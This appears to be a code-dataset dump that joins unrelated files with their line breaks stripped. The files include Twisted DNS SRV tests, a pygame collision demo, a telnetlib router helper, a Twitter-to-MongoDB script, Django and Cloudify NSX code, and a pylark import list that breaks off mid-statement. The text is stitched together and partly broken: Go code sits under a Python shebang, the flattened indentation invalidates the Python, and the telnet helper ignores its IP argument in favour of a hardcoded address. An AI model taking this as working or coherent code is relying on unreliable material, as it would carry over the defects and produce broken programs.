self.assertIdentical(None, self.factory.reason) self.assertEqual( self.reactor.tcpClients.pop()[:2], ('example.org', 'xmpp-server')) def test_SRVNoService(self): """ Test that connecting fails when no service is present. """ payload = dns.Record_SRV(port=5269, target='.', ttl=60) client.theResolver.results = [dns.RRHeader(name='example.org', type=dns.SRV, cls=dns.IN, ttl=60, payload=payload)] self.connector.connect() self.assertNotIdentical(None, self.factory.reason) self.factory.reason.trap(DNSLookupError) self.assertEqual(self.reactor.tcpClients, []) def test_unicodeDomain(self): """ L{srvconnect.SRVConnector} automatically encodes unicode domain using C{idna} encoding. """ self.connector = srvconnect.SRVConnector( self.reactor, 'xmpp-client', u'\u00e9chec.example.org', self.factory) self.assertIsInstance(self.connector.domain, bytes) self.assertEqual(b'xn--chec-9oa.example.org', self.connector.domain)
StarcoderdataPython
57142
"""" Parte 5: Criando Colisões """ #Importações necessárias para a criação da janela import pygame from pygame.locals import * from sys import exit from random import randint #Inicialização das váriaveis e funções do pygame pygame.init() #Criação da tela width = 640 height = 480 x = width/2 y = height/2 #Criando váriaveis para assumir diferentes valores para cada colisão x_blue = randint(40, 600) y_blue = randint(50, 430) screen = pygame.display.set_mode((width, height)) pygame.display.set_caption('Game') #Controlando a velocidade da movimentação do objeto clock = pygame.time.Clock() #Looping principal do jogo while True: clock.tick(30) screen.fill((0, 0, 0)) for event in pygame.event.get(): if event.type == QUIT: pygame.quit() exit() #Criando uma condição para mudar a movimentação de acordo com a tecla if event.type == KEYDOWN: if event.key == K_a: x = x - 20 if event.key == K_d: x = x + 20 if event.key == K_w: y = y - 20 if event.key == K_s: y = y + 20 #Criando uma condição caso a tecla continue a ser pressionada if pygame.key.get_pressed()[K_a]: x = x - 20 if pygame.key.get_pressed()[K_d]: x = x + 20 if pygame.key.get_pressed()[K_w]: y = y - 20 if pygame.key.get_pressed()[K_s]: y = y + 20 #Desenhando Objetos dentro da Tela e movimentando ret_red = pygame.draw.rect(screen, (255, 0, 0), (x, y, 40, 50))# ret_blue = pygame.draw.rect(screen, (0, 0, 255), (x_blue, y_blue, 40, 50)) #Criando Condições para cada colisão if ret_red.colliderect(ret_blue): x_blue = randint(40, 600) y_blue = randint(50, 430) pygame.display.update()
StarcoderdataPython
13547
import telnetlib import time def send_command_telnetlib(ipaddress, username, password, enable_pass, command): t = telnetlib.Telnet("192.168.100.1") t.read_until(b"Username:") t.write(username.encode("ascii") + b"\n") t.read_until(b"Password:") t.write(password.encode("ascii") + b"\n") t.write(b"enable\n") t.read_until(b"Password:") t.write(enable_pass.encode("ascii") + b"\n") t.read_until(b"#") t.write(b"terminal length 0\n") t.write(command + b"\n") time.sleep(1) result = t.read_until(b"#").decode("utf-8") return result
StarcoderdataPython
3322904
<gh_stars>10-100 #!/usr/bin/env python3 # TBD type Config struct { XXX map[string]interface{} `yaml:",inline"` } // avoid recursion in UnmarshalYAML type configAlias Config func (c *Config) UnmarshalYAML(unmarshal func(interface{}) error) error { a := (*configAlias)(c) if err := unmarshal(a); err != nil { return err } if len(c.XXX) != 0 { return errors.Errorf("undefined fields %v", c.XXX) } return nil } func (c *Config) Apply() error { if err := c.Validate(); err != nil { return err } return nil } func (c *Config) Validate() error { return nil }
StarcoderdataPython
51699
import math import copy from functools import reduce def matches(line, rules, rule): # this is the base case if "\"" in rule: if len(line) > 0 and line[0] == rule[1]: return [1] else: return [] # rule = ['1', '2'] rule = rule.split(" ") # this stores the possible offsets from line[0:] that match offsets = [] for i in range(len(rule)): r = rule[i] r = rules[r] # first iteration, offsets is empty if i == 0: for s in r: for m in matches(line, rules, s): if m not in offsets: offsets.append(m) continue new_offsets = [] for s in r: for o in offsets: for m in matches(line[o:], rules, s): new_offsets.append(o + m) offsets = new_offsets return offsets with open("input.txt", "r") as file: rules, messages = file.read().split("\n\n") # { '1': ['2 3', '3 2'] } rules = { k: v.split(" | ") for k, v in [r.split(": ") for r in rules.split("\n")] } rules['8'] = ['42', '42 8'] rules['11'] = ['42 31', '42 11 31'] #print("result:", matches(messages.split("\n")[0], rules, '1')) print("solution =", sum([len(m) in matches(m, rules, '0') for m in messages.split("\n")]))
StarcoderdataPython
1686540
import ctypes as c import struct from typing import List from . import constants as const from .fields.data_types import XmpEmpty from . import utils from .struct_header import ProtocolHeader class Request: def __init__( self, class_name: str, indices: List[int], cmd_type: int, cmd_code: int, module_index: int = const.NOTHING, port_index: int = const.NOTHING, values: object = None, ) -> None: self.class_name = class_name self.header = ProtocolHeader( magic_word = const.MAGIC_WORD, number_of_indices = len(indices), number_of_value_bytes = self._get_values_length(values), cmd_code = cmd_code, cmd_type = cmd_type, module_index = module_index, port_index = port_index, request_identifier = 0, ) self.index_values = indices self.values = values self.padding = ( 4 - (self.header.number_of_value_bytes % 4) if self.header.number_of_value_bytes % 4 else 0 ) def __str__(self) -> str: return utils.format_str( self, f"padding : {self.padding}", ) def __repr__(self) -> str: return utils.format_repr(self) def __bytes__(self) -> bytes: cmd_all = b"".join( ( bytes(self.header), # type: ignore struct.pack(f"!{self.header.number_of_indices}I", *self.index_values), self._get_values_bytes(self.values), bytes(self.padding), ) ) return cmd_all @staticmethod def _get_values_length(values: object) -> int: if values is None or not hasattr(values, "__annotations__"): return 0 return sum( getattr(values, k, XmpEmpty()).byte_length() for k in values.__annotations__.keys() ) @staticmethod def _get_values_bytes(values: object) -> bytes: if values is None or not hasattr(values, "__annotations__"): return b"" return b"".join( bytes(getattr(values, k)) for k in values.__annotations__.keys() )
StarcoderdataPython
127218
<gh_stars>1-10 # -*- coding: utf-8 -*- # Generated by Django 1.11.6 on 2017-12-22 17:56 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('goods', '0030_auto_20171222_1557'), ] operations = [ migrations.RemoveField( model_name='transactionmetrix', name='rfid_minus_upc', ), migrations.AddField( model_name='transactionmetrix', name='only_image_upc_num', field=models.PositiveIntegerField(default=0), ), migrations.AddField( model_name='transactionmetrix', name='only_rfid_upc_num', field=models.PositiveIntegerField(default=0), ), ]
StarcoderdataPython
82401
<gh_stars>0 """Twe following script is meant for being used for the TWITTER API-V2. The least tweepy version to use is 4.01""" import tweepy from credentials import * import logging import pymongo # create a connection to the mongodb running in the mongo container of the pipeline mongo_client = pymongo.MongoClient("mongodb") #create a new database called twitter db = mongo_client.twitter #create collection collection = db.tweets ##### AUTHENTICATION ##### twitter_client = tweepy.Client(bearer_token=BEARER_TOKEN,consumer_key=API_KEY,consumer_secret=API_KEY_SECRET, access_token=ACCESS_TOKEN,access_token_secret=ACCESS_TOKEN_SECRET) if twitter_client: logging.critical("\nAutentication OK") else: logging.critical('\nVerify your credentials') #### SEARCHING FOR TWEETS ##### # Defining a query search string query = 'pollution lang:en -is:retweet' search_tweets = twitter_client.search_recent_tweets(query=query,tweet_fields=['id','created_at','text'], max_results=100) for tweet in search_tweets.data: logging.critical(f'\n\n\nINCOMING TWEET:\n{tweet.text}\n\n\n') # create a json record and inserting it in the collections called tweets record = {'text': tweet.text, 'id': tweet.id, 'created_at': tweet.created_at} # and inserting it in the collections called collection_tweets collection.insert_one(record)
StarcoderdataPython
1797848
class Solution: def maxChunksToSorted(self, arr: List[int]) -> int: maxNum = count = 0 for i, a in enumerate(arr): maxNum = max(maxNum, a) if maxNum == i: count += 1 return count
StarcoderdataPython
3315000
######## # Copyright (c) 2016 GigaSpaces Technologies Ltd. All rights reserved # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # * See the License for the specific language governing permissions and # * limitations under the License. from cloudify import ctx from cloudify.decorators import operation import cloudify_nsx.library.nsx_esg_dlr as cfy_dlr import cloudify_nsx.library.nsx_common as common @operation def create(**kwargs): validation_rules = { "dlr_id": { "required": True }, "relayServer": { "default": {} }, "relayAgents": { "default": {} } } use_existing, relay_dict = common.get_properties_and_validate( 'relay', kwargs, validation_rules ) resource_id = ctx.instance.runtime_properties.get('resource_id') if resource_id: ctx.logger.info("Reused %s" % resource_id) return # credentials client_session = common.nsx_login(kwargs) cfy_dlr.update_dhcp_relay( client_session, relay_dict['dlr_id'], relay_dict['relayServer'], relay_dict['relayAgents'] ) resource_id = relay_dict['dlr_id'] ctx.instance.runtime_properties['resource_id'] = resource_id ctx.logger.info("created %s" % resource_id) @operation def delete(**kwargs): common.delete_object(cfy_dlr.del_dhcp_relay, 'relay', kwargs)
StarcoderdataPython
3388332
<reponame>chyroc/pylark # Code generated by lark_sdk_gen. DO NOT EDIT. """Feishu/Lark Open API Python Sdk, Support ALL Open API and Event Callback.""" from pylark.api_service_acs import LarkACSService from pylark.api_service_acs_access_record_list import ( GetACSAccessRecordListReq, GetACSAccessRecordListRespItem, GetACSAccessRecordListResp, ) from pylark.api_service_acs_access_record_photo_get import ( GetACSAccessRecordPhotoReq, GetACSAccessRecordPhotoResp, GetACSAccessRecordPhotoResp, ) from pylark.api_service_acs_device_list import ( GetACSDeviceListReq, GetACSDeviceListRespItem, GetACSDeviceListResp, ) from pylark.api_service_acs_user_face_get import ( GetACSUserFaceReq, GetACSUserFaceResp, GetACSUserFaceResp, ) from pylark.api_service_acs_user_face_update import ( UpdateACSUserFaceReq, UpdateACSUserFaceResp, ) from pylark.api_service_acs_user_get import ( GetACSUserReq, GetACSUserRespUserFeature, GetACSUserRespUser, GetACSUserResp, ) from pylark.api_service_acs_user_list import ( GetACSUserListReq, GetACSUserListRespItemFeature, GetACSUserListRespItem, GetACSUserListResp, ) from pylark.api_service_acs_user_update import ( UpdateACSUserReqFeature, UpdateACSUserReq, UpdateACSUserResp, ) from pylark.api_service_admin import LarkAdminService from pylark.api_service_admin_admin_dept_stats_get import ( GetAdminDeptStatsReq, GetAdminDeptStatsRespItem, GetAdminDeptStatsResp, ) from pylark.api_service_admin_admin_user_stats_get import ( GetAdminUserStatsReq, GetAdminUserStatsRespItem, GetAdminUserStatsResp, ) from pylark.api_service_ai import LarkAIService from pylark.api_service_ai_detect_face_attributes import ( DetectFaceAttributesReq, DetectFaceAttributesRespFaceInfoQualityOcclude, DetectFaceAttributesRespFaceInfoQuality, DetectFaceAttributesRespFaceInfoAttributeMask, DetectFaceAttributesRespFaceInfoAttributeGlass, DetectFaceAttributesRespFaceInfoAttributeHat, DetectFaceAttributesRespFaceInfoAttributePose, DetectFaceAttributesRespFaceInfoAttributeEmotion, DetectFaceAttributesRespFaceInfoAttributeGender, DetectFaceAttributesRespFaceInfoAttribute, DetectFaceAttributesRespFaceInfoPositionLowerRight, DetectFaceAttributesRespFaceInfoPositionUpperLeft, DetectFaceAttributesRespFaceInfoPosition, DetectFaceAttributesRespFaceInfo, DetectFaceAttributesRespImageInfo, DetectFaceAttributesResp, ) from pylark.api_service_ai_detect_text_language import ( DetectTextLanguageReq, DetectTextLanguageResp, ) from pylark.api_service_ai_recognize_basic_image import ( RecognizeBasicImageReq, RecognizeBasicImageResp, ) from pylark.api_service_ai_recognize_speech_file import ( RecognizeSpeechFileReqConfig, RecognizeSpeechFileReqSpeech, RecognizeSpeechFileReq, RecognizeSpeechFileResp, ) from pylark.api_service_ai_recognize_speech_stream import ( RecognizeSpeechStreamReqConfig, RecognizeSpeechStreamReqSpeech, RecognizeSpeechStreamReq, RecognizeSpeechStreamResp, ) from pylark.api_service_ai_translate_text import ( TranslateTextReqGlossary, TranslateTextReq, TranslateTextResp, ) from pylark.api_service_application import LarkApplicationService from pylark.api_service_application_app_admin_user_list import ( GetApplicationAppAdminUserListReq, GetApplicationAppAdminUserListRespUserOpenID, GetApplicationAppAdminUserListRespUser, GetApplicationAppAdminUserListResp, ) from pylark.api_service_application_app_list import ( GetApplicationAppListReq, GetApplicationAppListRespAppList, GetApplicationAppListResp, ) from pylark.api_service_application_app_visibility_get import ( GetApplicationAppVisibilityReq, GetApplicationAppVisibilityRespUser, GetApplicationAppVisibilityRespDepartment, GetApplicationAppVisibilityResp, ) from pylark.api_service_application_app_visibility_update import ( UpdateApplicationAppVisibilityReqAddUsers, UpdateApplicationAppVisibilityReqDelUsers, UpdateApplicationAppVisibilityReq, UpdateApplicationAppVisibilityResp, ) from pylark.api_service_application_is_user_admin import ( IsApplicationUserAdminReq, IsApplicationUserAdminResp, ) from pylark.api_service_application_message_detail import ( GetApplicationMessageDetailReq, GetApplicationMessageDetailRespUsersRead, GetApplicationMessageDetailRespTarget, GetApplicationMessageDetailResp, ) from pylark.api_service_application_message_overview import ( GetApplicationMessageOverviewReq, GetApplicationMessageOverviewRespGroupReadPv, GetApplicationMessageOverviewRespGroupRead, GetApplicationMessageOverviewRespGroupReceivedPv, GetApplicationMessageOverviewRespGroupReceived, GetApplicationMessageOverviewRespGroupSentPv, GetApplicationMessageOverviewRespGroupSent, GetApplicationMessageOverviewRespP2pReadPv, GetApplicationMessageOverviewRespP2pRead, GetApplicationMessageOverviewRespP2pReceivedPv, GetApplicationMessageOverviewRespP2pReceived, GetApplicationMessageOverviewRespP2pSentPv, GetApplicationMessageOverviewRespP2pSent, GetApplicationMessageOverviewResp, ) from pylark.api_service_application_message_trend import ( GetApplicationMessageTrendReq, GetApplicationMessageTrendRespGroupReadTimestamp, GetApplicationMessageTrendRespGroupRead, GetApplicationMessageTrendRespGroupReceivedTimestamp, GetApplicationMessageTrendRespGroupReceived, GetApplicationMessageTrendRespGroupSentTimestamp, GetApplicationMessageTrendRespGroupSent, GetApplicationMessageTrendRespP2pReadTimestamp, GetApplicationMessageTrendRespP2pRead, GetApplicationMessageTrendRespP2pReceivedTimestamp, GetApplicationMessageTrendRespP2pReceived, GetApplicationMessageTrendRespP2pSentTimestamp, GetApplicationMessageTrendRespP2pSent, GetApplicationMessageTrendResp, ) from pylark.api_service_application_order_get import ( GetApplicationOrderReq, GetApplicationOrderRespOrder, GetApplicationOrderResp, ) from pylark.api_service_application_order_list import ( GetApplicationOrderListReq, GetApplicationOrderListRespOrderList, GetApplicationOrderListResp, ) from pylark.api_service_application_paid_scope_check_user import ( CheckUserIsInApplicationPaidScopeReq, CheckUserIsInApplicationPaidScopeResp, ) from pylark.api_service_application_usage_detail import ( GetApplicationUsageDetailReqFilter, GetApplicationUsageDetailReq, GetApplicationUsageDetailRespUser, GetApplicationUsageDetailResp, ) from pylark.api_service_application_usage_overview import ( GetApplicationUsageOverviewReq, GetApplicationUsageOverviewRespItem, GetApplicationUsageOverviewResp, ) from pylark.api_service_application_usage_trend import ( GetApplicationUsageTrendReqFilter, GetApplicationUsageTrendReq, GetApplicationUsageTrendRespItemTrend, GetApplicationUsageTrendRespItem, GetApplicationUsageTrendResp, ) from pylark.api_service_application_user_admin_scope_get import ( GetApplicationUserAdminScopeReq, GetApplicationUserAdminScopeResp, ) from pylark.api_service_application_user_visible_app_get import ( GetApplicationUserVisibleAppReq, GetApplicationUserVisibleAppRespAppList, GetApplicationUserVisibleAppResp, ) from pylark.api_service_approval import LarkApprovalService from pylark.api_service_approval_approval_get import ( GetApprovalReq, GetApprovalRespViewer, GetApprovalRespNode, GetApprovalResp, ) from pylark.api_service_approval_carbon_copy_create import ( CreateApprovalCarbonCopyReq, CreateApprovalCarbonCopyResp, ) from pylark.api_service_approval_carbon_copy_search import ( SearchApprovalCarbonCopyReq, SearchApprovalCarbonCopyRespCcLink, SearchApprovalCarbonCopyRespCc, SearchApprovalCarbonCopyRespInstanceLink, SearchApprovalCarbonCopyRespInstance, SearchApprovalCarbonCopyRespGroup, SearchApprovalCarbonCopyRespApprovalExternal, SearchApprovalCarbonCopyRespApproval, SearchApprovalCarbonCopyResp, SearchApprovalCarbonCopyResp, ) from pylark.api_service_approval_file_upload import ( UploadApprovalFileReq, UploadApprovalFileResp, ) from pylark.api_service_approval_get_user_task_list import ( GetApprovalUserTaskListReq, GetApprovalUserTaskListRespCount, GetApprovalUserTaskListRespTaskURLs, GetApprovalUserTaskListRespTask, GetApprovalUserTaskListResp, ) from pylark.api_service_approval_instance_add_sign import ( AddApprovalInstanceSignReq, AddApprovalInstanceSignResp, ) from pylark.api_service_approval_instance_approve import ( ApproveApprovalInstanceReq, ApproveApprovalInstanceResp, ) from pylark.api_service_approval_instance_cancel import ( CancelApprovalInstanceReq, CancelApprovalInstanceResp, ) from pylark.api_service_approval_instance_create import ( CreateApprovalInstanceReq, CreateApprovalInstanceResp, ) from pylark.api_service_approval_instance_get import ( GetApprovalInstanceReq, GetApprovalInstanceRespTimelineExt, GetApprovalInstanceRespTimelineCcUser, GetApprovalInstanceRespTimeline, GetApprovalInstanceRespComment, GetApprovalInstanceRespTask, GetApprovalInstanceResp, ) from pylark.api_service_approval_instance_list import ( GetApprovalInstanceListReq, GetApprovalInstanceListResp, ) from pylark.api_service_approval_instance_preview import ( PreviewApprovalInstanceReqForm, PreviewApprovalInstanceReq, PreviewApprovalInstanceResp, ) from pylark.api_service_approval_instance_reject import ( RejectApprovalInstanceReq, RejectApprovalInstanceResp, ) from pylark.api_service_approval_instance_search import ( SearchApprovalInstanceReq, SearchApprovalInstanceRespInstanceInstanceLink, SearchApprovalInstanceRespInstanceInstance, SearchApprovalInstanceRespInstanceApprovalGroup, SearchApprovalInstanceRespInstanceApprovalExternal, SearchApprovalInstanceRespInstanceApproval, SearchApprovalInstanceRespInstance, SearchApprovalInstanceResp, ) from pylark.api_service_approval_instance_transfer import ( TransferApprovalInstanceReq, TransferApprovalInstanceResp, ) from pylark.api_service_approval_message_update import ( UpdateApprovalMessageReq, UpdateApprovalMessageResp, ) from pylark.api_service_approval_task_search import ( SearchApprovalTaskReq, SearchApprovalTaskRespTaskTaskLink, SearchApprovalTaskRespTaskTask, SearchApprovalTaskRespTaskInstanceLink, SearchApprovalTaskRespTaskInstance, SearchApprovalTaskRespTaskGroup, SearchApprovalTaskRespTaskApprovalExternal, SearchApprovalTaskRespTaskApproval, SearchApprovalTaskRespTask, SearchApprovalTaskResp, ) from pylark.api_service_attendance import LarkAttendanceService from pylark.api_service_attendance_file_download import ( DownloadAttendanceFileReq, DownloadAttendanceFileResp, DownloadAttendanceFileResp, ) from pylark.api_service_attendance_file_upload import ( UploadAttendanceFileReq, UploadAttendanceFileRespFile, UploadAttendanceFileResp, ) from pylark.api_service_attendance_group_create_update import ( CreateUpdateAttendanceGroupReqGroupNoNeedPunchSpecialDay, CreateUpdateAttendanceGroupReqGroupNeedPunchSpecialDay, CreateUpdateAttendanceGroupReqGroupFreePunchCfg, CreateUpdateAttendanceGroupReqGroupLocation, CreateUpdateAttendanceGroupReqGroupMachine, CreateUpdateAttendanceGroupReqGroup, CreateUpdateAttendanceGroupReq, CreateUpdateAttendanceGroupRespGroupNoNeedPunchSpecialDay, CreateUpdateAttendanceGroupRespGroupNeedPunchSpecialDay, CreateUpdateAttendanceGroupRespGroupFreePunchCfg, CreateUpdateAttendanceGroupRespGroupLocation, CreateUpdateAttendanceGroupRespGroupMachine, CreateUpdateAttendanceGroupRespGroup, CreateUpdateAttendanceGroupResp, ) from pylark.api_service_attendance_group_delete import ( DeleteAttendanceGroupReq, DeleteAttendanceGroupResp, ) from pylark.api_service_attendance_group_get import ( GetAttendanceGroupReq, GetAttendanceGroupRespGroupIDNoNeedPunchSpecialDay, GetAttendanceGroupRespGroupIDNeedPunchSpecialDay, GetAttendanceGroupRespGroupIDFreePunchCfg, GetAttendanceGroupRespGroupIDLocation, GetAttendanceGroupRespGroupIDMachine, GetAttendanceGroupRespGroupID, GetAttendanceGroupResp, ) from pylark.api_service_attendance_remedy_approval_init import ( InitAttendanceRemedyApprovalReq, InitAttendanceRemedyApprovalRespUserRemedy, InitAttendanceRemedyApprovalResp, ) from pylark.api_service_attendance_remedy_approval_update import ( UpdateAttendanceRemedyApprovalReq, UpdateAttendanceRemedyApprovalRespApprovalInfo, UpdateAttendanceRemedyApprovalResp, ) from pylark.api_service_attendance_shift_create import ( CreateAttendanceShiftReqRestTimeRule, CreateAttendanceShiftReqLateOffLateOnRule, CreateAttendanceShiftReqPunchTimeRule, CreateAttendanceShiftReq, CreateAttendanceShiftRespShiftRestTimeRule, CreateAttendanceShiftRespShiftLateOffLateOnRule, CreateAttendanceShiftRespShiftPunchTimeRule, CreateAttendanceShiftRespShift, CreateAttendanceShiftResp, ) from pylark.api_service_attendance_shift_delete import ( DeleteAttendanceShiftReq, DeleteAttendanceShiftResp, ) from pylark.api_service_attendance_shift_get_by_id import ( GetAttendanceShiftByIDReq, GetAttendanceShiftByIDRespRestTimeRule, GetAttendanceShiftByIDRespLateOffLateOnRule, GetAttendanceShiftByIDRespPunchTimeRule, GetAttendanceShiftByIDResp, ) from pylark.api_service_attendance_shift_get_by_name import ( GetAttendanceShiftByNameReq, GetAttendanceShiftByNameRespRestTimeRule, GetAttendanceShiftByNameRespLateOffLateOnRule, GetAttendanceShiftByNameRespPunchTimeRule, GetAttendanceShiftByNameResp, ) from pylark.api_service_attendance_statistics_data_get import ( GetAttendanceStatisticsDataReq, GetAttendanceStatisticsDataRespUserDataDataFeature, GetAttendanceStatisticsDataRespUserDataData, GetAttendanceStatisticsDataRespUserData, GetAttendanceStatisticsDataResp, ) from pylark.api_service_attendance_statistics_header_get import ( GetAttendanceStatisticsHeaderReq, GetAttendanceStatisticsHeaderRespUserStatsFieldFieldChildField, GetAttendanceStatisticsHeaderRespUserStatsFieldField, GetAttendanceStatisticsHeaderRespUserStatsField, GetAttendanceStatisticsHeaderResp, ) from pylark.api_service_attendance_user_allowed_remedy_get import ( GetAttendanceUserAllowedRemedyReq, GetAttendanceUserAllowedRemedyRespUserAllowedRemedys, GetAttendanceUserAllowedRemedyResp, ) from pylark.api_service_attendance_user_approval_create import ( CreateAttendanceUserApprovalReqUserApprovalTrip, CreateAttendanceUserApprovalReqUserApprovalOvertimeWork, CreateAttendanceUserApprovalReqUserApprovalLeave, CreateAttendanceUserApprovalReqUserApprovalOut, CreateAttendanceUserApprovalReqUserApproval, CreateAttendanceUserApprovalReq, CreateAttendanceUserApprovalRespUserApprovalTrip, CreateAttendanceUserApprovalRespUserApprovalOvertimeWork, CreateAttendanceUserApprovalRespUserApprovalLeave, CreateAttendanceUserApprovalRespUserApprovalOut, CreateAttendanceUserApprovalRespUserApproval, CreateAttendanceUserApprovalResp, ) from pylark.api_service_attendance_user_approval_get import ( GetAttendanceUserApprovalReq, GetAttendanceUserApprovalRespUserApprovalTrip, GetAttendanceUserApprovalRespUserApprovalOvertimeWork, GetAttendanceUserApprovalRespUserApprovalLeave, GetAttendanceUserApprovalRespUserApprovalOut, GetAttendanceUserApprovalRespUserApproval, GetAttendanceUserApprovalResp, ) from pylark.api_service_attendance_user_daily_shift_create_update import ( CreateUpdateAttendanceUserDailyShiftReqUserDailyShift, CreateUpdateAttendanceUserDailyShiftReq, CreateUpdateAttendanceUserDailyShiftRespUserDailyShift, CreateUpdateAttendanceUserDailyShiftResp, ) from pylark.api_service_attendance_user_daily_shift_get import ( GetAttendanceUserDailyShiftReq, GetAttendanceUserDailyShiftRespUserDailyShift, GetAttendanceUserDailyShiftResp, ) from pylark.api_service_attendance_user_flow_batch_create import ( BatchCreateAttendanceUserFlowReqFlowRecord, BatchCreateAttendanceUserFlowReq, BatchCreateAttendanceUserFlowRespFlowRecord, BatchCreateAttendanceUserFlowResp, ) from pylark.api_service_attendance_user_flow_batch_get import ( BatchGetAttendanceUserFlowReq, BatchGetAttendanceUserFlowRespUserFlowResult, BatchGetAttendanceUserFlowResp, ) from pylark.api_service_attendance_user_flow_get import ( GetAttendanceUserFlowReq, GetAttendanceUserFlowResp, ) from pylark.api_service_attendance_user_settings_query import ( QueryAttendanceUserSettingsReq, QueryAttendanceUserSettingsRespUserSetting, QueryAttendanceUserSettingsResp, ) from pylark.api_service_attendance_user_settings_update import ( UpdateAttendanceUserSettingsReqUserSetting, UpdateAttendanceUserSettingsReq, UpdateAttendanceUserSettingsRespUserSetting, UpdateAttendanceUserSettingsResp, ) from pylark.api_service_attendance_user_statistics_settings_get import ( GetAttendanceUserStatisticsSettingsReq, GetAttendanceUserStatisticsSettingsRespViewItemChildItem, GetAttendanceUserStatisticsSettingsRespViewItem, GetAttendanceUserStatisticsSettingsRespView, GetAttendanceUserStatisticsSettingsResp, ) from pylark.api_service_attendance_user_statistics_settings_update import ( UpdateAttendanceUserStatisticsSettingsReqViewItemChildItem, UpdateAttendanceUserStatisticsSettingsReqViewItem, UpdateAttendanceUserStatisticsSettingsReqView, UpdateAttendanceUserStatisticsSettingsReq, UpdateAttendanceUserStatisticsSettingsRespViewItemChildItem, UpdateAttendanceUserStatisticsSettingsRespViewItem, UpdateAttendanceUserStatisticsSettingsRespView, UpdateAttendanceUserStatisticsSettingsResp, ) from pylark.api_service_attendance_user_task_get import ( GetAttendanceUserTaskReq, GetAttendanceUserTaskRespUserTaskResultRecordCheckOutRecord, GetAttendanceUserTaskRespUserTaskResultRecordCheckInRecord, GetAttendanceUserTaskRespUserTaskResultRecord, GetAttendanceUserTaskRespUserTaskResult, GetAttendanceUserTaskResp, ) from pylark.api_service_attendance_user_task_remedy_get import ( GetAttendanceUserTaskRemedyReq, GetAttendanceUserTaskRemedyRespUserRemedy, GetAttendanceUserTaskRemedyResp, ) from pylark.api_service_auth import LarkAuthService from pylark.api_service_auth_access_token_get import ( GetAccessTokenReq, GetAccessTokenResp, ) from pylark.api_service_auth_access_token_refresh import ( RefreshAccessTokenReq, RefreshAccessTokenResp, ) from pylark.api_service_auth_app_ticket_resend import ( ResendAppTicketReq, ResendAppTicketResp, ) from pylark.api_service_auth_tenant_access_token_get import ( GetTenantAccessTokenReq, TokenExpire, ) from pylark.api_service_auth_user_info_get import GetUserInfoReq, GetUserInfoResp from pylark.api_service_bitable import LarkBitableService from pylark.api_service_bitable_field_create import ( CreateBitableFieldReqPropertyOption, CreateBitableFieldReqProperty, CreateBitableFieldReq, CreateBitableFieldRespFieldPropertyOption, CreateBitableFieldRespFieldProperty, CreateBitableFieldRespField, CreateBitableFieldResp, ) from pylark.api_service_bitable_field_delete import ( DeleteBitableFieldReq, DeleteBitableFieldResp, ) from pylark.api_service_bitable_field_list import ( GetBitableFieldListReq, GetBitableFieldListRespItemPropertyOption, GetBitableFieldListRespItemProperty, GetBitableFieldListRespItem, GetBitableFieldListResp, ) from pylark.api_service_bitable_field_update import ( UpdateBitableFieldReqPropertyOption, UpdateBitableFieldReqProperty, UpdateBitableFieldReq, UpdateBitableFieldRespFieldPropertyOption, UpdateBitableFieldRespFieldProperty, UpdateBitableFieldRespField, UpdateBitableFieldResp, ) from pylark.api_service_bitable_meta_get import ( GetBitableMetaReq, GetBitableMetaRespApp, GetBitableMetaResp, ) from pylark.api_service_bitable_record_batch_create import ( BatchCreateBitableRecordReqRecord, BatchCreateBitableRecordReq, BatchCreateBitableRecordRespRecord, BatchCreateBitableRecordResp, ) from pylark.api_service_bitable_record_batch_delete import ( BatchDeleteBitableRecordReq, BatchDeleteBitableRecordRespRecord, BatchDeleteBitableRecordResp, ) from pylark.api_service_bitable_record_batch_update import ( BatchUpdateBitableRecordReqRecord, BatchUpdateBitableRecordReq, BatchUpdateBitableRecordRespRecord, BatchUpdateBitableRecordResp, ) from pylark.api_service_bitable_record_create import ( CreateBitableRecordReq, CreateBitableRecordRespRecord, CreateBitableRecordResp, ) from pylark.api_service_bitable_record_delete import ( DeleteBitableRecordReq, DeleteBitableRecordResp, ) from pylark.api_service_bitable_record_get import ( GetBitableRecordReq, GetBitableRecordRespRecord, GetBitableRecordResp, ) from pylark.api_service_bitable_record_list import ( GetBitableRecordListReq, GetBitableRecordListRespItem, GetBitableRecordListResp, ) from pylark.api_service_bitable_record_update import ( UpdateBitableRecordReq, UpdateBitableRecordRespRecord, UpdateBitableRecordResp, ) from pylark.api_service_bitable_table_batch_create import ( BatchCreateBitableTableReqTable, BatchCreateBitableTableReq, BatchCreateBitableTableResp, ) from pylark.api_service_bitable_table_batch_delete import ( BatchDeleteBitableTableReq, BatchDeleteBitableTableResp, ) from pylark.api_service_bitable_table_create import ( CreateBitableTableReqTable, CreateBitableTableReq, CreateBitableTableResp, ) from pylark.api_service_bitable_table_delete import ( DeleteBitableTableReq, DeleteBitableTableResp, ) from pylark.api_service_bitable_table_list import ( GetBitableTableListReq, GetBitableTableListRespItem, GetBitableTableListResp, ) from pylark.api_service_bitable_view_create import ( CreateBitableViewReq, CreateBitableViewRespApptableview, CreateBitableViewResp, ) from pylark.api_service_bitable_view_delete import ( DeleteBitableViewReq, DeleteBitableViewResp, ) from pylark.api_service_bitable_view_list import ( GetBitableViewListReq, GetBitableViewListRespItem, GetBitableViewListResp, ) from pylark.api_service_bot import LarkBotService from pylark.api_service_bot_add import AddBotToChatReq, AddBotToChatResp from pylark.api_service_bot_info import GetBotInfoReq, GetBotInfoResp from pylark.api_service_calendar import LarkCalendarService from pylark.api_service_calendar_acl_create import ( CreateCalendarACLReqScope, CreateCalendarACLReq, CreateCalendarACLRespScope, CreateCalendarACLResp, ) from pylark.api_service_calendar_acl_delete import ( DeleteCalendarACLReq, DeleteCalendarACLResp, ) from pylark.api_service_calendar_acl_get_list import ( GetCalendarACLListReq, GetCalendarACLListRespACLScope, GetCalendarACLListRespACL, GetCalendarACLListResp, ) from pylark.api_service_calendar_acl_subscribe import ( SubscribeCalendarACLReq, SubscribeCalendarACLResp, ) from pylark.api_service_calendar_calendar_create import ( CreateCalendarReq, CreateCalendarRespCalendar, CreateCalendarResp, ) from pylark.api_service_calendar_calendar_delete import ( DeleteCalendarReq, DeleteCalendarResp, ) from pylark.api_service_calendar_calendar_event_attendee_chat_member_list import ( GetCalendarEventAttendeeChatMemberListReq, 